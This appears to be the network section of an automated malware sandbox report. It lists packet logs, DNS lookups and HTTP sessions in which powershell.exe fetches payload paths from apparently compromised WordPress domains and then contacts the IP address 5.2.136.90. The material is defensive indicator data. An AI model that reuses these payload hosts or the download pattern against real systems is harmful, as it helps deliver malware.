                                                    Jan 6, 2021 08:36:59.620927095 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.620937109 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620956898 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.620970964 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.620975971 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621001005 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621010065 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621023893 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621043921 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621056080 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621064901 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621084929 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621104002 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621112108 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621124983 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621145010 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621145964 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621177912 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621181965 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621186018 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621201992 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621222019 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621238947 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621243000 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621263981 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621273994 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621284962 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621304989 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621325016 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621326923 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621344090 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621368885 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621376991 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621411085 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621419907 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621433020 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621463060 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621464014 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621483088 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621501923 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621517897 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.621521950 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621542931 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.621553898 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.622204065 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886245966 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886305094 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886327982 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886344910 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886359930 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886377096 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886393070 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886404991 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886420965 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886432886 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886436939 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886452913 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886452913 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886456013 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886476994 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886492014 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886492014 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886511087 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886528015 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886528015 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886543989 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886559963 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886559963 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886575937 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886595964 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886682034 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886694908 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886728048 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886734962 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886739969 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886755943 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886768103 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886776924 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886807919 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886821985 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886830091 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886861086 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886867046 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886902094 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886934042 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.886940002 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.886982918 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887017012 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887018919 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887058973 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887089014 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887093067 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887109995 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887126923 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887140036 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887144089 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887160063 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887173891 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887175083 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887191057 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887206078 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887206078 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887222052 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887238026 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887240887 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887258053 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887273073 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887274027 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887290001 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887304068 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887309074 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887324095 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887339115 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:36:59.887340069 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.887367964 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:36:59.888786077 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.151493073 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151524067 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151536942 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151549101 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151560068 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151572943 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151590109 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151607990 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151624918 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151643991 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.151732922 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152018070 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152041912 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152066946 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152070045 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152092934 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152101994 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152129889 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152153969 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152165890 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152199030 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152215958 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152218103 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152241945 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152259111 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152266979 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152276039 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152291059 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152307034 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152324915 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152326107 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152339935 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152345896 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152364969 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152379990 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.152379990 CET8049168210.86.239.69192.168.2.22
                                                    Jan 6, 2021 08:37:00.152527094 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.460702896 CET4916880192.168.2.22210.86.239.69
                                                    Jan 6, 2021 08:37:00.460741997 CET4916680192.168.2.22104.27.145.251
                                                    Jan 6, 2021 08:37:00.461287975 CET4916580192.168.2.22104.18.61.59
                                                    Jan 6, 2021 08:37:12.827656984 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:37:12.900475979 CET80491695.2.136.90192.168.2.22
                                                    Jan 6, 2021 08:37:12.900597095 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:37:12.901599884 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:37:12.901701927 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:37:12.974510908 CET80491695.2.136.90192.168.2.22
                                                    Jan 6, 2021 08:37:12.974643946 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:37:13.047394991 CET80491695.2.136.90192.168.2.22
                                                    Jan 6, 2021 08:37:13.047550917 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:37:13.120431900 CET80491695.2.136.90192.168.2.22
                                                    Jan 6, 2021 08:37:13.743518114 CET80491695.2.136.90192.168.2.22
                                                    Jan 6, 2021 08:37:13.743596077 CET80491695.2.136.90192.168.2.22
                                                    Jan 6, 2021 08:37:13.743619919 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:37:13.743648052 CET4916980192.168.2.225.2.136.90
                                                    Jan 6, 2021 08:38:18.739162922 CET80491695.2.136.90192.168.2.22
                                                    Jan 6, 2021 08:38:18.739314079 CET4916980192.168.2.225.2.136.90

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 6, 2021 08:36:55.091664076 CET5219753192.168.2.228.8.8.8
                                                    Jan 6, 2021 08:36:55.147933006 CET53521978.8.8.8192.168.2.22
                                                    Jan 6, 2021 08:36:55.313417912 CET5309953192.168.2.228.8.8.8
                                                    Jan 6, 2021 08:36:55.486767054 CET53530998.8.8.8192.168.2.22
                                                    Jan 6, 2021 08:36:55.605438948 CET5283853192.168.2.228.8.8.8
                                                    Jan 6, 2021 08:36:55.771003962 CET53528388.8.8.8192.168.2.22
                                                    Jan 6, 2021 08:36:56.121351004 CET6120053192.168.2.228.8.8.8
                                                    Jan 6, 2021 08:36:57.130614996 CET6120053192.168.2.228.8.8.8
                                                    Jan 6, 2021 08:36:58.144870996 CET6120053192.168.2.228.8.8.8
                                                    Jan 6, 2021 08:36:58.179588079 CET53612008.8.8.8192.168.2.22
                                                    Jan 6, 2021 08:36:58.196563959 CET4954853192.168.2.228.8.8.8
                                                    Jan 6, 2021 08:36:58.547627926 CET53495488.8.8.8192.168.2.22
                                                    Jan 6, 2021 08:36:59.198977947 CET53612008.8.8.8192.168.2.22
                                                    Jan 6, 2021 08:37:00.203015089 CET53612008.8.8.8192.168.2.22

                                                    ICMP Packets

                                                    TimestampSource IPDest IPChecksumCodeType
                                                    Jan 6, 2021 08:36:59.199070930 CET192.168.2.228.8.8.8d00a(Port unreachable)Destination Unreachable
                                                    Jan 6, 2021 08:37:00.203088999 CET192.168.2.228.8.8.8d00a(Port unreachable)Destination Unreachable

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 6, 2021 08:36:55.091664076 CET192.168.2.228.8.8.80xfc39Standard query (0)wpsapk.comA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.313417912 CET192.168.2.228.8.8.80x9175Standard query (0)sofsuite.comA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.605438948 CET192.168.2.228.8.8.80xc6ccStandard query (0)veterinariadrpopui.comA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:56.121351004 CET192.168.2.228.8.8.80xd92dStandard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:57.130614996 CET192.168.2.228.8.8.80xd92dStandard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:58.144870996 CET192.168.2.228.8.8.80xd92dStandard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:58.196563959 CET192.168.2.228.8.8.80x62a5Standard query (0)khanhhoahomnay.netA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 6, 2021 08:36:55.147933006 CET8.8.8.8192.168.2.220xfc39No error (0)wpsapk.com104.18.61.59A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.147933006 CET8.8.8.8192.168.2.220xfc39No error (0)wpsapk.com104.18.60.59A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.147933006 CET8.8.8.8192.168.2.220xfc39No error (0)wpsapk.com172.67.141.14A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.486767054 CET8.8.8.8192.168.2.220x9175No error (0)sofsuite.com104.27.145.251A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.486767054 CET8.8.8.8192.168.2.220x9175No error (0)sofsuite.com172.67.158.72A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.486767054 CET8.8.8.8192.168.2.220x9175No error (0)sofsuite.com104.27.144.251A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:55.771003962 CET8.8.8.8192.168.2.220xc6ccNo error (0)veterinariadrpopui.com209.59.139.39A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:58.179588079 CET8.8.8.8192.168.2.220xd92dServer failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:58.547627926 CET8.8.8.8192.168.2.220x62a5No error (0)khanhhoahomnay.net210.86.239.69A (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:36:59.198977947 CET8.8.8.8192.168.2.220xd92dServer failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 6, 2021 08:37:00.203015089 CET8.8.8.8192.168.2.220xd92dServer failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • wpsapk.com
                                                    • sofsuite.com
                                                    • veterinariadrpopui.com
                                                    • khanhhoahomnay.net
                                                    • 5.2.136.90

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249165104.18.61.5980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 6, 2021 08:36:55.231106043 CET0OUTGET /wp-admin/v/ HTTP/1.1
                                                    Host: wpsapk.com
                                                    Connection: Keep-Alive
                                                    Jan 6, 2021 08:36:55.301549911 CET1INHTTP/1.1 200 OK
                                                    Date: Wed, 06 Jan 2021 07:36:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d9976cc72e1611881ea7b58828e16c6881609918615; expires=Fri, 05-Feb-21 07:36:55 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax
                                                    X-Frame-Options: SAMEORIGIN
                                                    cf-request-id: 077839a6e30000c78d1103e000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Y2%2BS6cr%2FmbhAwHl6TWKd1rJu99fjtlWjdX5L9rDuig7gd%2FUwm5as04FJCVVBW3%2FSnVzUreoM7ErEDWsXV5BJoTcVYoBME9dG5ZFC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 60d3c55168f4c78d-AMS
                                                    Data Raw: 31 30 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74
                                                    Data Ascii: 10d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-widt
                                                    Jan 6, 2021 08:36:55.301584005 CET3INData Raw: 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79
                                                    Data Ascii: h,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.
                                                    Jan 6, 2021 08:36:55.301595926 CET4INData Raw: 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 66
                                                    Data Ascii: lumn"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p
                                                    Jan 6, 2021 08:36:55.301606894 CET5INData Raw: 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d
                                                    Data Ascii: </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-ite
                                                    Jan 6, 2021 08:36:55.301615000 CET5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.2249166104.27.145.25180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 6, 2021 08:36:55.538140059 CET6OUTGET /wp-includes/2jm3nIk/ HTTP/1.1
                                                    Host: sofsuite.com
                                                    Connection: Keep-Alive
                                                    Jan 6, 2021 08:36:55.597255945 CET7INHTTP/1.1 200 OK
                                                    Date: Wed, 06 Jan 2021 07:36:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=db3ff3f511400f0a7486533388d0a5d301609918615; expires=Fri, 05-Feb-21 07:36:55 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax
                                                    X-Frame-Options: SAMEORIGIN
                                                    cf-request-id: 077839a8170000410e7fa99000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VK1SguZ9ZuqG4MHbsjZ0Hwii3Ago%2BKB1nK8KlN9tvXa11ieLvzucb5z53qqLp0gYWFchuhRkTy9Cdl8xq6%2BXEIyAlDHhejTjNv%2Fr990%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 60d3c5535a71410e-PRG
